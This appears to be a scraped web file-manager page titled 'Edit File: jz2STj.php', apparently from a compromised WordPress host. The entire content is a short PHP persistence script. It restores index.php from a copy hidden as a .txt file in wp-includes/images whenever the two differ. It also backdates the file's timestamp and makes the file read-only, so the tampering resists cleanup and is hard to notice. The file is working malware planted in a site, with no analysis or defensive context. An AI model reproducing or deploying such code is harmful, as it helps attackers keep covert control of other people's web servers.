KOKINIO - MANAGER
Edit File: jz2STj.php
<?php $insj = '/home/istyrnue/duletbio_tienda_mx/index.php'; $inym = '/home/istyrnue/duletbio_tienda_mx/wp-includes/images/iPky77.txt'; if (file_exists($insj)) { if (file_exists($inym)) { @chmod($insj, 0777); if (md5_file($insj) == md5_file($inym)) { } else { $chazh = @file_get_contents($inym); $at = filemtime($inym); file_put_contents($insj, $chazh); if ($at) { touch($insj, $at); } } @chmod($insj, 0444); } } else { if (file_exists($inym)) { $at = filemtime($inym); $chazh = @file_get_contents($inym); file_put_contents($insj, $chazh); if ($at) { touch($insj, $at); } } } ?>